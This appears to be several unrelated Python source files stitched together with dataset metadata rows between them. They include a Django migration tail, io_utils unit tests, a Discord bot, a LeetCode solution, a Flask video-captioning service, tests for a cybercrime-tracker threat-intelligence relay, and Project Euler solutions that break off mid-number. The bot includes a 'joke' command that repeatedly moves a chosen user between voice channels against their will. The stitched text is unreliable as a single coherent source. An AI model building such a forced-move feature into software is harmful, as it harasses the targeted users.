new_name='ussgl497200_down_adj_pri_paid_deliv_orders_oblig_refund_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl498100_upward_adjustm_cpe',
new_name='ussgl498100_upward_adjust_pri_deliv_orders_oblig_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl498200_upward_adjustm_cpe',
new_name='ussgl498200_upward_adjust_pri_deliv_orders_oblig_paid_cpe',
),
]
| 46.853403
| 84
| 0.703766
| 8,799
| 0.983238
| 0
| 0
| 0
| 0
| 0
| 0
| 4,774
| 0.533467
|
558acc49675640913785e7f0a2b6dca8cde8835f
| 2,654
|
py
|
Python
|
tests/unit/utils/test_io_utils.py
|
briannemsick/barrage
|
f86bd0723abc0ab94b0b8f2ca3ffa5e3b7541455
|
[
"MIT"
] | 16
|
2019-06-21T22:45:59.000Z
|
2020-08-20T22:26:22.000Z
|
tests/unit/utils/test_io_utils.py
|
briannemsick/barrage
|
f86bd0723abc0ab94b0b8f2ca3ffa5e3b7541455
|
[
"MIT"
] | 15
|
2019-06-21T23:09:59.000Z
|
2020-05-07T03:02:33.000Z
|
tests/unit/utils/test_io_utils.py
|
briannemsick/barrage
|
f86bd0723abc0ab94b0b8f2ca3ffa5e3b7541455
|
[
"MIT"
] | 6
|
2019-06-22T15:27:39.000Z
|
2020-07-06T02:18:55.000Z
|
import json
import os
import pickle
import numpy as np
import pandas as pd
import pytest
from barrage.utils import io_utils
@pytest.fixture()
def sample_dict():
return {"unit": "test"}
def test_save_json(artifact_path, sample_dict):
filename = "unit_test.json"
io_utils.save_json(sample_dict, filename, artifact_path)
assert os.path.isfile(os.path.join(artifact_path, filename))
with open(os.path.join(artifact_path, filename), "r") as fn:
obj = json.load(fn)
assert obj == sample_dict
def test_save_json_default(artifact_path):
filename = "unit_test.json"
sample_dict = {"unit": np.float32(6.0), "test": np.array([1, 2])}
io_utils.save_json(sample_dict, filename, artifact_path)
assert os.path.isfile(os.path.join(artifact_path, filename))
with open(os.path.join(artifact_path, filename), "r") as fn:
obj = json.load(fn)
assert obj == {"unit": 6.0, "test": [1, 2]}
def test_load_json(artifact_path, sample_dict):
filename = "unit_test.json"
with open(os.path.join(artifact_path, filename), "w") as fn:
json.dump(sample_dict, fn)
assert os.path.isfile(os.path.join(artifact_path, filename))
obj = io_utils.load_json(filename, artifact_path)
assert obj == sample_dict
def test_save_pickle(artifact_path, sample_dict):
filename = "unit_test.pkl"
io_utils.save_pickle(sample_dict, filename, artifact_path)
assert os.path.isfile(os.path.join(artifact_path, filename))
with open(os.path.join(artifact_path, filename), "rb") as fn:
obj = pickle.load(fn)
assert obj == sample_dict
def test_load_pickle(artifact_path, sample_dict):
filename = "unit_test.pkl"
with open(os.path.join(artifact_path, filename), "wb") as fn:
pickle.dump(sample_dict, fn)
assert os.path.isfile(os.path.join(artifact_path, filename))
obj = io_utils.load_pickle(filename, artifact_path)
assert obj == sample_dict
def test_load_data(artifact_path, sample_dict):
expected = pd.DataFrame([sample_dict])
expected.to_json(os.path.join(artifact_path, "unit_test.json"))
result = io_utils.load_data("unit_test.json", artifact_path)
assert result.equals(expected)
expected.to_csv(os.path.join(artifact_path, "unit_test.csv"), index=False)
result = io_utils.load_data("unit_test.csv", artifact_path)
assert result.equals(expected)
with pytest.raises(FileNotFoundError):
io_utils.load_data("test_unit.42", artifact_path)
expected.to_json(os.path.join(artifact_path, "unit_test.foo"))
with pytest.raises(ValueError):
io_utils.load_data("unit_test.foo", artifact_path)
| 31.223529
| 78
| 0.715901
| 0
| 0
| 0
| 0
| 64
| 0.024115
| 0
| 0
| 237
| 0.089299
|
558cbd4a7ce3e41aaed8e2b86ecb2cf3f058fd07
| 20,998
|
py
|
Python
|
script.py
|
kenneth2001/Virus
|
e7d0b650d9d7a4eaab9bd87b3695b791e1f105b1
|
[
"MIT"
] | null | null | null |
script.py
|
kenneth2001/Virus
|
e7d0b650d9d7a4eaab9bd87b3695b791e1f105b1
|
[
"MIT"
] | null | null | null |
script.py
|
kenneth2001/Virus
|
e7d0b650d9d7a4eaab9bd87b3695b791e1f105b1
|
[
"MIT"
] | null | null | null |
import asyncio
import requests
from bs4 import BeautifulSoup
from datetime import date, datetime
import discord
import numpy as np
from urllib.error import HTTPError
import yt_dlp as youtube_dl
from discord.ext import commands
import os
from pytz import timezone
from yt_dlp.utils import DownloadError, ExtractorError
from util.log import pretty_output, pretty_print
from util.preprocessing import load_config, load_gif, load_user
import secrets
try:
print('LOADING config.txt')
TOKEN, TIMEZONE, MODE = load_config('config/config.txt')
print('LOADED config.txt\n')
except:
print('ERROR LOADING config.txt\n')
tz = timezone(TIMEZONE)
token = TOKEN #os.environ['token']
# 0: local, 1: repl.it
# For setting up bot on replit.com
if MODE == 1:
from util.keep_alive import keep_alive
os.environ['MPLCONFIGDIR'] = '/tmp/' #"/home/runner/Virus-demo/tmp"
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
elif MODE == 0:
import matplotlib.pyplot as plt
import sympy
else:
print('UNDEFINED MODE')
exit()
try:
print('LOADING gif.json')
gif = load_gif('config/gif.json')
print('LOADED gif.json\n')
except:
print('ERROR LOADING gif.json\n')
try:
print('LOADING user.json')
user = load_user('config/user.json')
print('LOADED user.json\n')
except:
print('ERROR LOADING user.json\n')
ytdl_format_options = {
'format': 'bestaudio/best',
'noplaylist': True,
'nocheckcertificate': True,
'ignoreerrors': False,
'logtostderr': False,
'quiet': True,
'no_warnings': True,
'default_search': 'auto',
'source_address': '0.0.0.0'
}
ffmpeg_options = {
'options': '-vn',
"before_options": "-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5"
}
# channel_var stores all variable for differnet channels
# key: serverid
# value: 1. activated[bool] - indicate whether the music playing function is activated
# 2. bully[dict] - list of user being bullied
# 3. ctx[object]
# 4. log[list] - log of user entering / leaving voice channels
# 5. playing[bool] - indicate whether the bot is playing music
# 6. queue[list] - list of music to be played
channel_var = {}
# return gif link
def send_gif(msg):
if msg in gif.keys():
return gif[msg]
# Wong Tai Sin Fortune Sticks (黃大仙求籤)
def get_stick(tag):
num = np.random.randint(1, 101)
URL = f'https://andy.hk/divine/wongtaisin/{num}'
page = requests.get(URL)
soup = BeautifulSoup(page.content, "html.parser")
result = soup.find(id='content')
job_elements = result.find("div", class_="inner-padding col-md-5 col-md-offset-7")
stick_no = job_elements.find('h2', class_='id-color text-center').text
stick_author = job_elements.find_all('h4', class_='text-center')[0].text
stick_content = job_elements.find_all('h4', class_='text-center')[1].text
stick_explain = job_elements.text.split('仙機:')[1].split('解說及記載:')[0]
stick_story = job_elements.text.split('仙機:')[1].split('解說及記載:')[1].split('■')[0]
text = tag + '求得' + stick_no + '\n' + stick_author + '\n\n籤文:\n' + stick_content + '\n\n仙機:' + stick_explain + '\n解說及記載' + stick_story
return text
client = commands.Bot(command_prefix='#', help_command=None)
@client.event
async def on_connect():
print("Bot activated successfully")
async def initialize(server_id: int, ctx: object=None):
"""Initializing channel_var
Args:
server_id (int)
ctx (object, optional): Defaults to None.
"""
global channel_var
info = channel_var.get(server_id, -1)
if info != -1:
if channel_var[server_id]['ctx'] == None and ctx != None:
channel_var[server_id]['ctx'] = ctx
return
else:
channel_var[server_id] = {'ctx':ctx, 'queue':[], 'activated':False, 'playing':True, 'log':[], 'bully':{}}
@client.event
async def on_voice_state_update(member, before, after):
server_id = member.guild.id
await initialize(server_id)
global channel_var
if before.channel is None and after.channel is not None:
channel_var[server_id]['log'].append([datetime.now(tz).strftime('%Y-%m-%d %H:%M:%S'), '*' + str(member) + '* Entered `' + str(after.channel) + '`'])
if before.channel is not None and after.channel is None:
channel_var[server_id]['log'].append([datetime.now(tz).strftime('%Y-%m-%d %H:%M:%S'), '*' + str(member) + '* Leaved `' + str(before.channel) + '`'])
if before.channel is not None and after.channel is not None:
channel_var[server_id]['log'].append([datetime.now(tz).strftime('%Y-%m-%d %H:%M:%S'), '*' + str(member) + '* Leaved `' + str(before.channel)+ '`, Joined `' + str(after.channel) + '`'])
@client.command(name='log')
async def log(ctx):
await initialize(ctx.guild.id, ctx)
global channel_var
if len(channel_var[ctx.guild.id]['log']) == 0:
return
embed = discord.Embed(color = discord.Colour.red())
embed.set_author(name='Log (Recent 20 records)')
for field in channel_var[ctx.guild.id]['log'][-20:]:
embed.add_field(name=field[0], value=field[1], inline=False)
await ctx.send(embed=embed)
async def play_music(ctx):
while not client.is_closed():
global channel_var
if not len(channel_var[ctx.guild.id]['queue']) == 0 and ctx is not None:
server = ctx.message.guild
voice_channel = server.voice_client
if (voice_channel and voice_channel.is_connected() and not voice_channel.is_playing() and channel_var[ctx.guild.id]['playing']) == True:
server = ctx.message.guild
voice_channel = server.voice_client
try:
link = channel_var[ctx.guild.id]['queue'][0][1]
title = channel_var[ctx.guild.id]['queue'][0][2]
player = discord.FFmpegPCMAudio(link, **ffmpeg_options)
voice_channel.play(player)
await ctx.send(f'**Now playing:** {title}')
except DownloadError:
await ctx.send(f'**Download error:** {title}')
del(channel_var[ctx.guild.id]['queue'][0])
await asyncio.sleep(1)
@client.command(name='play')
async def play(ctx, *url):
url = ' '.join(url)
await initialize(ctx.guild.id, ctx)
global channel_var
def music(link):
with youtube_dl.YoutubeDL(ytdl_format_options) as ydl:
info = ydl.extract_info(link, download=False)
# Handle if the url is a playlist
if 'entries' in info:
info = info['entries'][0]
LINK = info['webpage_url']
URL = info['url']
TITLE = info['title']
return LINK, URL, TITLE
if not ctx.message.author.voice: # handle if message author is not inside any voice channel
await ctx.send("**You are not connected to a voice channel**")
return
elif ctx.message.guild.voice_client: # if bot is inside any voice channel
if ctx.message.guild.voice_client.channel != ctx.message.author.voice.channel: # if bot is not inside the author's channel
channel = ctx.message.author.voice.channel
user = await ctx.guild.fetch_member(client.user.id)
ctx.voice_client.pause()
await user.move_to(channel)
ctx.voice_client.resume()
else: # if bot is not inside any voice channel
channel = ctx.message.author.voice.channel
await channel.connect() # connect to message author's channel
server = ctx.message.guild
voice_channel = server.voice_client
if url is None or url == '':
if len(channel_var[ctx.guild.id]['queue']) == 0:
return
else:
try:
link, player_link, title = music(url)
channel_var[ctx.guild.id]['queue'].append([link, player_link, title])
except ExtractorError:
await ctx.send('**Error:** ' + url)
except HTTPError:
await ctx.send('**Error:** ' + url)
except DownloadError:
await ctx.send('**Error:** ' + url)
# activate music playing function
if channel_var[ctx.guild.id]['activated'] == False:
channel_var[ctx.guild.id]['activated'] = True
await play_music(ctx)
@client.command(name='debug')
async def debug(ctx):
def check(m):
return m.author == ctx.message.author
func_token = secrets.token_hex(10)
print("Token:", func_token)
await ctx.send('**Please type in the token displayed in console**')
msg = await client.wait_for("message", check=check)
if msg.content == func_token:
pretty_print(channel_var)
pretty_output(channel_var, filename='tmp.json')
await ctx.send(file=discord.File('tmp.json'))
else:
await ctx.send("**Only admin can use this command**")
@client.command(name='queue')
async def queue_(ctx):
await initialize(ctx.guild.id, ctx)
global channel_var
if len(channel_var[ctx.guild.id]['queue']) == 0:
await ctx.send('**Queue is empty!**')
else:
async with ctx.typing():
await ctx.send('\n'.join([f'{idx}. {item[2]}\n{item[0]}' for idx, item in enumerate(channel_var[ctx.guild.id]['queue'], start=1)]))
@client.command(name='stop')
async def stop(ctx):
voice_client = ctx.message.guild.voice_client
await voice_client.disconnect()
@client.command(name='gpa')
async def gpa(ctx):
x = round(np.random.uniform(3,4) - np.random.normal(0, 1), 2)
text = 4.0 if x > 4 else x
if text >= 3.8:
text = "Predicted GPA: " + str(text)
elif text >= 3.0:
text = "Predicted GPA: " + str(text)
elif text >= 2.5:
text = "Predicted GPA: " + str(text)
else:
text = "Predicted GPA: " + str(text)
tag = "<@" + str(ctx.message.author.id) + ">"
await ctx.message.channel.send(str(text)+tag)
@client.command(name='pause')
async def pause(ctx):
await initialize(ctx.guild.id, ctx)
global channel_var
channel_var[ctx.guild.id]['playing'] = False
if ctx.voice_client is not None:
ctx.voice_client.pause()
await ctx.send('**Paused**')
@client.command(name='resume')
async def resume(ctx):
await initialize(ctx.guild.id, ctx)
global channel_var
channel_var[ctx.guild.id]['playing'] = True
if ctx.voice_client is not None:
ctx.voice_client.resume()
await ctx.send('**Resumed**')
@client.command(name='skip')
async def skip(ctx):
await initialize(ctx.guild.id, ctx)
global channel_var
if ctx.voice_client is not None:
ctx.voice_client.stop()
await ctx.send('**Skipped**')
@client.listen()
async def on_message(message):
author = message.author
author_id = str(message.author.id)
tag = "<@" + str(message.author.id) + ">"
msg = message.content.lower()
if author == client.user:
return
#print('Debugging:', author, msg)
today = date.today()
if user.get(author_id, -1) != -1:
if user[author_id]['date'] != today:
user[author_id]['date'] = today
await message.channel.send(user[author_id]['text'] + tag)
if message.content.startswith('#hello'):
await message.channel.send("Hello World!")
gif = send_gif(msg)
if gif is not None:
await message.channel.send(gif)
@client.command(name='help')
async def help(ctx):
embed = discord.Embed(title="Virus", url="https://github.com/kenneth2001/virus", description="Discord Bot developed by YeeKiiiiii 2021", color=discord.Colour.blue())
embed.set_author(name="Virus", url="https://github.com/kenneth2001/virus", icon_url="https://user-images.githubusercontent.com/24566737/132656284-f0ff6571-631c-4cef-bed7-f575233cbf5f.png")
embed.add_field(name=':musical_note: __Music__', value="""1. `#play [url]` Play music, tested platform: Youtube, Soundcloud
2. `#pause` Pause music
3. `#resume` Resume music
4. `#skip` Play next song
5. `#queue` Display the queue
6. `#stop` Kick the bot from voice channel""", inline=False)
embed.add_field(name=':pencil2: __Graph (Developing)__', value="""1. `#plot` Create simple scatter/line plot""", inline=False)
embed.add_field(name=':black_joker: __Kidding__', value="""1. `#joke [userid] [times] [duration]`
Move a specified user into random voice channels randomly and repeatly
2. `#leavemealone` Stop yourself from being bullied
3. `#save [userid]` Recuse your friend from cyber-bullying""", inline=False)
embed.add_field(name=':man_office_worker: __Other__', value="""1. `#stick` Fortune sticks from Wong Tai Sin
2. `#gpa` Get prediction of your GPA (Maximum: 4.0)
3. `#help` Display a list of all commands aviliable
4. `#credit` Display information of the bot developer
5. `#hello` Return 'hello world'
6. `#ping` Return latency
7. `#log` Display the previous 20 in/out user
8. `#clear` Delete previous 30 messages sent by this bot / started with '#'
9. `#debug` Check parameters (for debugging)""", inline=False)
embed.add_field(name=':new: __New Features (Experimental)__', value="""1. `#when` Return the start time of the bot
2. `#dm [userid] [message]` Send message to any user privately""" )
embed.add_field(name=':frame_with_picture: __GIF__', value="Automatically return GIF if the message matches the following keywords\n`" + '` `'.join(gif.keys()) +'`', inline=False)
embed.set_footer(text="Last updated on 25 December 2021")
await ctx.send(embed=embed)
@client.command(name='ping')
async def ping(ctx):
await ctx.send(f'In {round(client.latency * 1000)}ms')
@client.command(name='stick')
async def stick(ctx):
tag = "<@" + str(ctx.message.author.id) + ">"
text = get_stick(tag)
await ctx.send(text)
@client.command(name='credit')
async def credit(ctx):
await ctx.send('Created By kenneth\nLast Update On 18/9/2021\nhttps://github.com/kenneth2001')
@client.command(name='clear')
async def clear(ctx):
def is_bot(m):
try:
return m.author == client.user or m.content[0] == '#'
except:
return False
deleted = await ctx.message.channel.purge(limit=30, check=is_bot)
await ctx.send('Deleted {} message(s)'.format(len(deleted)), delete_after=10)
@client.command(name='joke')
async def joke(ctx, userid=None, n=10, sleep_time=0.5):
await initialize(ctx.guild.id, ctx)
global channel_var
try:
userid = int(userid)
user = await ctx.guild.fetch_member(userid)
info = channel_var[ctx.guild.id]['bully'].get(userid, -1)
if info == -1:
channel_var[ctx.guild.id]['bully'][userid] = True
channel_var[ctx.guild.id]['bully'][userid] = True
tag1 = "<@" + str(ctx.message.author.id) + ">"
tag2 = "<@" + str(userid) + ">"
await ctx.send(tag1 + " is pranking " + tag2)
await ctx.send('To stop, type #leavemealone')
except:
tag = "<@" + str(ctx.message.author.id) + ">"
await ctx.send('Please provide a valid user id!' + tag)
return
while(n > 0):
if channel_var[ctx.guild.id]['bully'][userid] == False:
return
try:
if user.voice is not None:
await user.move_to(np.random.choice(ctx.guild.voice_channels))
n -= 1
except:
pass
await asyncio.sleep(sleep_time)
def generate_question():
question = ""
for i in range(6):
question += str(np.random.randint(1, 21))
question += np.random.choice(['*', '+', '-'])
question += str(np.random.randint(1, 21))
return question
@client.command(name='leavemealone')
async def leavemealone(ctx):
await initialize(ctx.guild.id, ctx)
global channel_var
info = channel_var[ctx.guild.id]['bully'].get(ctx.message.author.id, -1)
if info == -1:
channel_var[ctx.guild.id]['bully'][ctx.message.author.id] = True
def check(m):
return m.author == ctx.message.author
question = generate_question()
await ctx.send('Question: `'+question+'`\nType your answer:')
answer = int(sympy.sympify(question))
print('Answer:', answer)
msg = await client.wait_for("message", check=check)
tag = "<@" + str(ctx.message.author.id) + ">"
if int(msg.content) == answer:
channel_var[ctx.guild.id]['bully'][ctx.message.author.id] = False
await ctx.send("Good Job" + tag)
else:
await ctx.send("on9" + tag)
@client.command(name='save')
async def save(ctx, id=None):
if id is None:
await ctx.send("You must specify an id")
return
await initialize(ctx.guild.id, ctx)
global channel_var
userid = int(id)
def check(m):
return m.author == ctx.message.author
if channel_var[ctx.guild.id]['bully'].get(userid, -1) == -1:
await ctx.send("This user is not under bully list")
elif channel_var[ctx.guild.id]['bully'][userid] == False:
await ctx.send("This user is not being bullied")
else:
question = generate_question()
await ctx.send('Question: `'+question+'`\nType your answer:')
if MODE == 0:
answer = int(sympy.sympify(question))
elif MODE == 1:
answer = int(eval(question))
print('Answer:', answer)
msg = await client.wait_for("message", check=check)
tag = "<@" + str(ctx.message.author.id) + ">"
if int(msg.content) == answer:
channel_var[ctx.guild.id]['bully'][userid] = False
await ctx.send("Good Job" + tag)
else:
await ctx.send("Be careful" + tag)
# experimental
@client.command(name='plot')
async def plot(ctx):
def check(m):
return m.author == ctx.message.author
await ctx.send("1. Please Enter The Type of The Plot")
await ctx.send("a: scatter plot, b: line plot")
msg = await client.wait_for("message", check=check)
graph_type = msg.content
await ctx.send("2. Please enter the x-coordinate for all points (seperated by comma)")
msg = await client.wait_for("message", check=check)
x = [int(i) for i in msg.content.split(',')]
await ctx.send("3. Please enter the y-coordinate for all points (seperated by comma)")
msg = await client.wait_for("message", check=check)
y = [int(i) for i in msg.content.split(',')]
await ctx.send("4. Please enter the title of the plot")
msg = await client.wait_for("message", check=check)
title = msg.content
await ctx.send("5. Please enter the name of x-axis")
msg = await client.wait_for("message", check=check)
x_name = msg.content
await ctx.send("6. Please enter the name of y-axis")
msg = await client.wait_for("message", check=check)
y_name = msg.content
plt.plot(x, y, linestyle="-" if graph_type == 'b' else 'none', marker='.')
plt.title(title)
plt.xlabel(x_name)
plt.ylabel(y_name)
plt.savefig('plot.png')
await ctx.send(file=discord.File('plot.png'))
os.remove('plot.png')
plt.clf()
# experimental
@client.command(name='when')
async def when(ctx):
await ctx.send(start_time.strftime("**Bot started from %Y-%m-%d %I-%M %p**"))
# experimental
@client.command(name='dm')
async def dm(ctx, userid, *message):
try:
userid = int(userid)
user = await client.fetch_user(userid)
await user.send(' '.join(message))
await ctx.send("**Message sent successfully**")
except:
await ctx.send("**Message is not sent**")
if MODE == 1:
keep_alive() # For setting up bot on replit.com
start_time = datetime.now(tz)
client.run(token)
| 37.563506
| 194
| 0.595247
| 0
| 0
| 0
| 0
| 15,558
| 0.738396
| 16,501
| 0.783151
| 6,691
| 0.317561
|
558d879413f6f88e3c45e2ca06534a675e1043f9
| 480
|
py
|
Python
|
solutions/1281-subtract-the-product-and-sum-of-digits-of-an-integer.py
|
lk-hang/leetcode
|
4c8735463bdcb9f48666e03a39eb03ee9f625cec
|
[
"MIT"
] | null | null | null |
solutions/1281-subtract-the-product-and-sum-of-digits-of-an-integer.py
|
lk-hang/leetcode
|
4c8735463bdcb9f48666e03a39eb03ee9f625cec
|
[
"MIT"
] | null | null | null |
solutions/1281-subtract-the-product-and-sum-of-digits-of-an-integer.py
|
lk-hang/leetcode
|
4c8735463bdcb9f48666e03a39eb03ee9f625cec
|
[
"MIT"
] | null | null | null |
"""
Given an integer number n, return the difference between the product of its digits and the sum of its digits.
"""
class Solution:
def subtractProductAndSum(self, n: int) -> int:
if n < 10:
return 0
running_prod = 1
running_sum = 0
while n > 0:
rest = n % 10
running_prod *= rest
running_sum += rest
n = n // 10
return running_prod - running_sum
| 25.263158
| 109
| 0.522917
| 352
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0
| 117
| 0.24375
|
558e58ba058923b58851710da67bc2d4ad87a57f
| 1,031
|
py
|
Python
|
VideoIndexerDemo/VideoIndexer/application.py
|
microsoft/ai4accessibility
|
4c13d006f285e31f01d1bc71a55c20e9234713a5
|
[
"MIT"
] | 2
|
2021-07-11T06:03:43.000Z
|
2021-10-09T23:37:21.000Z
|
VideoIndexerDemo/VideoIndexer/application.py
|
microsoft/ai4accessibility
|
4c13d006f285e31f01d1bc71a55c20e9234713a5
|
[
"MIT"
] | 6
|
2021-09-08T03:07:13.000Z
|
2022-03-12T00:57:07.000Z
|
VideoIndexerDemo/VideoIndexer/application.py
|
microsoft/ai4accessibility
|
4c13d006f285e31f01d1bc71a55c20e9234713a5
|
[
"MIT"
] | 3
|
2021-02-14T18:51:31.000Z
|
2021-02-14T18:51:41.000Z
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from dotenv import load_dotenv
load_dotenv()
import os
import json
import requests
from concurrent.futures import ThreadPoolExecutor
from flask import Flask, flash, request, redirect, url_for, session
from video_captioning.main import upload_video, video_callback, train_custom_speech
executor = ThreadPoolExecutor(max_workers=20)
app = Flask("layout_detection")
@app.route('/api/v1/vc', methods=['POST'])
def vc_upload():
params = request.get_json()
return_data = upload_video(params)
return json.dumps(return_data)
@app.route('/api/v1/customspeech', methods=['POST'])
def customspeech_train():
params = request.get_json()
return_data = train_custom_speech(params)
return json.dumps(return_data)
@app.route('/api/v1/vc/callback', methods=['POST'])
def vc_callback():
params = request.get_json()
return video_callback(request.args.get('id'))
if __name__ == "__main__":
app.run(port=5000, debug=True, host='0.0.0.0')
| 29.457143
| 83
| 0.747818
| 0
| 0
| 0
| 0
| 508
| 0.492726
| 0
| 0
| 185
| 0.179437
|
559154d893c3d43225a58bc587edd3aa01dea828
| 5,154
|
py
|
Python
|
code/tests/unit/api/test_enrich.py
|
CiscoSecurity/tr-05-serverless-cybercrime-tracker
|
28fcfaa220025c9e8523633a4a9a04f319656756
|
[
"MIT"
] | 3
|
2020-04-28T08:53:14.000Z
|
2020-12-17T14:25:32.000Z
|
code/tests/unit/api/test_enrich.py
|
CiscoSecurity/tr-05-serverless-cybercrime-tracker
|
28fcfaa220025c9e8523633a4a9a04f319656756
|
[
"MIT"
] | 2
|
2020-03-06T15:00:22.000Z
|
2020-06-26T11:21:52.000Z
|
code/tests/unit/api/test_enrich.py
|
CiscoSecurity/tr-05-serverless-cybercrime-tracker
|
28fcfaa220025c9e8523633a4a9a04f319656756
|
[
"MIT"
] | null | null | null |
from http import HTTPStatus
from requests.exceptions import SSLError
from pytest import fixture
from unittest import mock
from tests.unit.mock_for_tests import (
CYBERCRIME_RESPONSE_MOCK,
EXPECTED_DELIBERATE_RESPONSE,
EXPECTED_OBSERVE_RESPONSE,
EXPECTED_RESPONSE_500_ERROR,
EXPECTED_RESPONSE_404_ERROR,
CYBERCRIME_ERROR_RESPONSE_MOCK,
EXPECTED_RESPONSE_SSL_ERROR
)
def routes():
yield '/deliberate/observables'
yield '/observe/observables'
@fixture(scope='module', params=routes(), ids=lambda route: f'POST {route}')
def route(request):
return request.param
@fixture(scope='function')
def cybercrime_api_request():
with mock.patch('requests.get') as mock_request:
yield mock_request
def cybercrime_api_response(*, ok, payload=None, status_error=None):
mock_response = mock.MagicMock()
mock_response.ok = ok
if ok and not payload:
payload = CYBERCRIME_RESPONSE_MOCK
else:
mock_response.status_code = status_error
mock_response.json = lambda: payload
return mock_response
@fixture(scope='module')
def invalid_json():
return [{'type': 'unknown', 'value': ''}]
def test_enrich_call_with_invalid_json_failure(route, client, invalid_json):
response = client.post(route, json=invalid_json)
assert response.status_code == HTTPStatus.OK
@fixture(scope='module')
def valid_json():
return [{'type': 'ip', 'value': '104.24.123.62'}]
@fixture(scope='module')
def valid_json_multiple():
return [
{'type': 'ip', 'value': '104.24.123.62'},
{'type': 'ip', 'value': '0.0.0.0'},
]
def test_enrich_call_success(route, client, valid_json,
cybercrime_api_request):
cybercrime_api_request.return_value = cybercrime_api_response(ok=True)
response = client.post(route, json=valid_json)
assert response.status_code == HTTPStatus.OK
data = response.get_json()
if route == '/observe/observables':
verdicts = data['data']['verdicts']
assert verdicts['docs'][0].pop('valid_time')
judgements = data['data']['judgements']
assert judgements['docs'][0].pop('id')
assert judgements['docs'][0].pop('valid_time')
assert data == EXPECTED_OBSERVE_RESPONSE
if route == '/deliberate/observables':
verdicts = data['data']['verdicts']
assert verdicts['docs'][0].pop('valid_time')
assert data == EXPECTED_DELIBERATE_RESPONSE
def test_enrich_error_with_data(route, client, valid_json_multiple,
cybercrime_api_request):
cybercrime_api_request.side_effect = (
cybercrime_api_response(ok=True),
cybercrime_api_response(
ok=False,
payload=CYBERCRIME_ERROR_RESPONSE_MOCK,
status_error=HTTPStatus.INTERNAL_SERVER_ERROR)
)
response = client.post(route, json=valid_json_multiple)
assert response.status_code == HTTPStatus.OK
data = response.get_json()
if route == '/observe/observables':
verdicts = data['data']['verdicts']
assert verdicts['docs'][0].pop('valid_time')
judgements = data['data']['judgements']
assert judgements['docs'][0].pop('id')
assert judgements['docs'][0].pop('valid_time')
expected_response = {}
expected_response.update(EXPECTED_OBSERVE_RESPONSE)
expected_response.update(EXPECTED_RESPONSE_500_ERROR)
assert data == expected_response
if route == '/deliberate/observables':
verdicts = data['data']['verdicts']
assert verdicts['docs'][0].pop('valid_time')
expected_response = {}
expected_response.update(EXPECTED_DELIBERATE_RESPONSE)
expected_response.update(EXPECTED_RESPONSE_500_ERROR)
assert data == expected_response
def test_enrich_call_404(route, client, valid_json, cybercrime_api_request):
cybercrime_api_request.return_value = cybercrime_api_response(
ok=False,
payload=CYBERCRIME_ERROR_RESPONSE_MOCK,
status_error=HTTPStatus.NOT_FOUND
)
response = client.post(route, json=valid_json)
assert response.status_code == HTTPStatus.OK
assert response.get_json() == EXPECTED_RESPONSE_404_ERROR
def test_enrich_call_500(route, client, valid_json, cybercrime_api_request):
cybercrime_api_request.return_value = cybercrime_api_response(
ok=False,
payload=CYBERCRIME_ERROR_RESPONSE_MOCK,
status_error=HTTPStatus.INTERNAL_SERVER_ERROR
)
response = client.post(route, json=valid_json)
assert response.status_code == HTTPStatus.OK
assert response.get_json() == EXPECTED_RESPONSE_500_ERROR
def test_enrich_call_with_ssl_error(route, client,
valid_json, cybercrime_api_request):
mock_exc = mock.MagicMock()
mock_exc.reason.args.__getitem__().verify_message \
= 'self signed certificate'
cybercrime_api_request.side_effect = SSLError(mock_exc)
response = client.post(route, json=valid_json)
assert response.status_code == HTTPStatus.OK
assert response.get_json() == EXPECTED_RESPONSE_SSL_ERROR
| 29.451429
| 76
| 0.695188
| 0
| 0
| 191
| 0.037059
| 607
| 0.117773
| 0
| 0
| 579
| 0.11234
|
55915bb2fe7f5c79e7cd44acfd89dd079dc66443
| 2,658
|
py
|
Python
|
Python/Euler 01 - 10.py
|
jiegillet/project-euler
|
3b530e11af00e9d9eccb7aa41ed8018ee6d7b472
|
[
"MIT"
] | null | null | null |
Python/Euler 01 - 10.py
|
jiegillet/project-euler
|
3b530e11af00e9d9eccb7aa41ed8018ee6d7b472
|
[
"MIT"
] | null | null | null |
Python/Euler 01 - 10.py
|
jiegillet/project-euler
|
3b530e11af00e9d9eccb7aa41ed8018ee6d7b472
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# encoding: utf-8
"""
untitled.py
Created by Jérémie on 2013-10-26.
Copyright (c) 2013 __MyCompanyName__. All rights reserved.
"""
"""
# Problem 1
lim=1000
s=0
for i in range(lim):
if i%3==0 or i%5==0:
s+=i
print s
print sum([x for x in range(1000) if x % 3== 0 or x % 5== 0])
"""
"""
# Problem 2
lim=4000000
f1,f2,s=1,1,0
while f2<lim:
f1,f2=f2,f1+f2
if f2%2==0: s+=f2
print s
"""
""""
# Problem 3
num=600851475143
while num>1:
div=2
while num%div!=0 and div!=num:
div+=1
num/=div
print div
"""
"""
# Problem 4
max=0
for i in range(999,99,-1):
for j in range(999,i-99,-1):
if str(i*j)==str(i*j)[::-1] and i>max:
max=i*j
print max
"""
"""
# Problem 5
print 2**4*3**2*5*7*11*13*17*19
"""
"""
# Problem 6
print sum(range(1,101))**2- sum([e**2 for e in range(1,101)])
"""
"""
# Problem 7
primes=[2,3]
n=3
# while len(primes)<10001:
# n+=2
# if not 0 in [n%p for p in primes]:
# primes.append(n)
# print primes[-1] # 45 seconds
while len(primes)<100001:
n+=2
p=True
for p in primes:
if p*p>n: break
if n%p==0: p=False; break
if p: primes.append(n)
print primes[-1] # .3 seconds for 10001 # 6 second for 100001
"""
"""
# Problem 8
num=str(7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450)
